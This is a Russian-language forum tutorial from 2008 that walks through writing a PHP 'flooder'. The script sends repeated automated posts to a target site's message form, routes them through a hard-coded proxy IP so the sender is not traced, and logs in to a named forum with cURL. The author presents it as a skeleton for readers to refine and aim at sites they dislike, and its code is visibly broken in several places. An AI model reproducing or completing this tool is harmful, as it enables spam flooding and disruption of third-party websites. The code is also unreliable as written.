GrinGo | Дата: Суббота, 29.11.2008, 21:54 | Сообщение # 1 |
Admin
Статус: Offline
| Пишем Флудер на PHP Серфил я как- то в инете и наткнулся на сайт фашистского содержания. Сплоитов под него не было, и я решил его зафладить.После не продолжительного ручного флада решил написать скрипт.Писать будем на cURL+sockets( Извращенцы рулят).Поехали set_time_limit(0); function flood($scrurl)//Можно сделать как отдельную функцию $scurl-Адрес скрипта отвечающего за отправку сообщений. Далее мы должны посмотреть какому скрипту и каким методом передаются данные.Я использовал HttpAnalyzer он встраивается в ИЕ и показывает HTTP пакеты посылаемые и приходящие. {$path="POST $scrurl rnrn"; $fp=fsockopen("216.139.170.54",80);//Мы же не хотим спалится)Указываем порт и IP прокси. $i=1; while(!$i=2)//Цикл для отпраки сообщений {$i++ fwrite($fp,$path); sleep(60)//К-во секунд, до следующей отправки сообщений } fclose($fp); } На многих форумах для отправки сообщений нужно осуществлять авторизацию. $login="hacker";//Логин $pass="hfsfdf";//Пасс $auth="http://ns-wp.cc/forum/index.php?action=login2";//Адрес скрипта отвечающего за авторизацию Далее идет часть на Курле $post = ‘login=’.$login.’&password=’.$password; $ch = curl_init();//Начинаем сессию Курла curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch) fuction flood($scrurl); ?> Вот и все , естественно для гостевых книг используется упрощенный вариант.Это лишь карскас, дорабатывайте и усовершенствуйте.
|
|
| |